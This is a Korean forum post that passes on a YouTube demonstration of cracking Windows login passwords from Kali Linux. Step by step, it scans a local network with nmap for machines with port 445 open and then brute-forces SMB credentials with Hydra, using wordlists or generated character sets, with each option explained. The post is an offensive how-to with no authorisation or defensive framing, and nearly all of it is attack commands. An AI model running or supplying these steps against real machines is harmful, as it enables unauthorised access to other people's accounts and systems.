윈도우 로그인 비밀번호 해킹 시연동영상을 유튜브에서 보고 여기 올려봅니다.
사용한 운영제체는 KALI 입니다
(1) 자신의 IP 확인
# ifconfig
(2) 공격 대상 IP 를 찾음
# nmap -sS 192.168.0.0/24
또는
# nmap -sV 192.168.0.0/24 (열려 있는 포트의 서비스와 버전정보를 보여줌)
445 포트가 열린 PC 를 찾아야 됨
(3) 아이디와 비밀번호 사전파일을 만들거나 인터넷에서 다운을 받음
(4) 무차별 대입으로 비밀번호을 알아냄
보통 두가지 방법이 있음
☞ 방법1 : 아이디 비번 사전 파일을 만들어서 무차별 대입하기
# hydra -L [아이디 사전파일] -P [패스워드 사전파일] [공격대상I IP] smb -V -f
# hydra -L user.txt -P pass.txt 192.168.0.125 smb -V -f
옵션 -f 는 아이디와 비밀번호는 최초 1회 찾으면 작업을 중단함
☞ 방법2 : 아이디를 미리 알고 있을 경우 옵션을 이용해서 비밀번호만 무차별 대입하기
# hydra -l 아이디 -x 숫자1:숫자2:a(A1!) 공격IP smb -V -f
옵션을 설명하면
슷자1은 최소자리수. 숫자2는 최대 자리수. a는 소문자 대표로 a~z 전체를 의미함. A 는 대문자 대표로 대문자 전체, 1은 0~9 를 의미함
특수문자는 각각 입력해야 됨
예시 1:5:a1 → 한자리 부터 5자리 까지 소문자와 숫자를 조합해서 무차별 대입
6:6:1$ → 6자리로만 숫자와 특수문자* 을 조합해서 무차별 대입
4:5:A1 → 4자리부터 해서 5자리까지 대문자와 숫자를 조합해서 무차별 대입함
# hydra -l user -x 4:4:a 192.168.0.125 smb -V -f
추가 옵션 설명 : 대문자 L 과 P 는 사전파일이 필요한 옵션이고 소문자 l 은 실제 아이디 이고 -x 는 비밀번호를 조합해서 사용함
게시글 목록
| 번호 | 제목 |
|---|---|
| 1636 | |
| 1635 | |
| 1634 | |
| 1633 | |
| 1624 | |
| 1623 | |
| 1622 | |
| 1621 | |
| 1620 | |
| 1619 | |
| 1618 | |
| 1617 | |
| 1615 | |
| 1611 | |
| 1608 | |
| 1599 | |
| 1598 | |
| 1595 | |
| 1594 | |
| 1593 | |
| 1588 | |
| 1587 | |
| 1585 | |
| 1583 | |
| 1579 | |
| 1577 | |
| 1576 | |
| 1570 | |
| 1559 | |
| 1556 |
댓글 작성
댓글을 작성하시려면 로그인이 필요합니다.
로그인하기